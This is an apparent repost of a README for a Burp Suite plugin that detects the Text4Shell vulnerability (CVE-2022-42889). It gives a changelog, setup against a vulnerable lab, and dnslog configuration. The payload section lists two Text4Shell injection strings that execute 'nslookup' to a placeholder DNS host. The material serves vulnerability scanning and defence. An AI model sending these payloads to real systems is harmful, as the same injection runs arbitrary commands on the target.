項(xiàng)目地址:https://github.com/A0WaQ4/BurpText4ShellScan
簡(jiǎn)介使用java編寫(xiě)的Text4shell burp被動(dòng)掃描插件
java maven項(xiàng)目,可以使用mvn package進(jìn)行編譯
更新
1.0 - 首次上傳,對(duì)所有經(jīng)過(guò)burp的包進(jìn)行被動(dòng)掃描,掃描對(duì)象包括了json、xml、fileupload
1.1 - 修復(fù)了body為空時(shí)導(dǎo)致的檢測(cè)錯(cuò)誤,修復(fù)了對(duì)URL參數(shù)不檢測(cè)的錯(cuò)誤
1.2 - 修復(fù)了body僅有json與xml時(shí)出現(xiàn)的參數(shù)構(gòu)造錯(cuò)誤,修復(fù)了dns二次檢測(cè)時(shí)未獲取key導(dǎo)致的錯(cuò)誤
1.3 - 添加了主動(dòng)掃描功能
1.4 - 添加了header黑名單功能,可以在resources/config.yml中修改
payload
- "%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup+dns-url%27%29%7D"
- "${scriptjava.lang.Runtime.getRuntime().exec('nslookup dns-url')}"
可以在resources/config.yml修改
使用
1. 搭建環(huán)境
使用github中的https://github.com/karthikuj/cve-2022-42889-text4shell-docker搭建環(huán)境
2.插件
代理訪問(wèn)http://yourip:80/text4shell/attack?search=aaa,開(kāi)始掃描
在logger中可看見(jiàn)插件發(fā)送的包
僅對(duì)是否可以dnslog進(jìn)行掃描,若dnslog接受到請(qǐng)求,則爆出漏洞
3. 配置
在resources/config.yml中的dnsLogModule修改dnslog配置,使用時(shí)可以修改為自搭建的DnsLog服務(wù)器
免責(zé)聲明
該工具僅用于安全自查檢測(cè),由于傳播、利用此工具所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),作者不為此承擔(dān)任何責(zé)任。
-
服務(wù)器
+關(guān)注
關(guān)注
13文章
9797瀏覽量
88038 -
JAVA
+關(guān)注
關(guān)注
20文章
2989瀏覽量
109953 -
GitHub
+關(guān)注
關(guān)注
3文章
483瀏覽量
17702
原文標(biāo)題:Text4Shell的burp被動(dòng)掃描插件
文章出處:【微信號(hào):菜鳥(niǎo)學(xué)信安,微信公眾號(hào):菜鳥(niǎo)學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。
發(fā)布評(píng)論請(qǐng)先 登錄
shell是什么?shell實(shí)現(xiàn)原理分析基于MM32 MCU的shell腳本源碼
了解鴻蒙OS Text組件

shell編程之shell是什么
Linux Shell系列教程之Shell while循環(huán)及特點(diǎn)
在RN4020,中央或觀察員角色執(zhí)行主動(dòng)掃描還是被動(dòng)掃描?
UNIX[1].shell范例精解(第4版)_code
[Shell腳本專(zhuān)家指南]人民郵電出版社.掃描版
免安裝代碼編輯器Sublime Text3已經(jīng)安裝好各種功能插件應(yīng)用程序

Linux中shell腳本執(zhí)的4種方式

FOFA聯(lián)動(dòng)XRAY小工具:XRAY-F
【Tools】被動(dòng)掃描工具EPScan
shell腳本基礎(chǔ)知識(shí)匯總4
BurpSuite多功能輔助插件配置介紹

Sublime Text 4 Build 4169文本編輯器的新功能

評(píng)論